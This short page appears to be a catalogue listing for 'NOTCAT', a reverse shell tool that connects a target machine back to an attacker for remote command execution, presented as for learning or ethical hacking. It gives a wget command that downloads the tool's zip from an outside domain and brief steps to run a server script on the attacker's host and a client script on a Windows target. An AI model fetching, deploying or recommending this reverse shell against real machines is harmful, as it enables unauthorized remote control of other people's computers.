NOTCAT
images:
summary:
NOTCAT is a lightweight reverse shell tool that connects a target machine back to an attacker, allowing remote command execution. It’s simple, minimal, and often used for learning or testing in ethical hacking.
download:
wget https://notdonk.click/d/notcat.zip
usage:
unzip notcat.zip
On host machine run:
python server.py
On client Windows machine run:
python client.py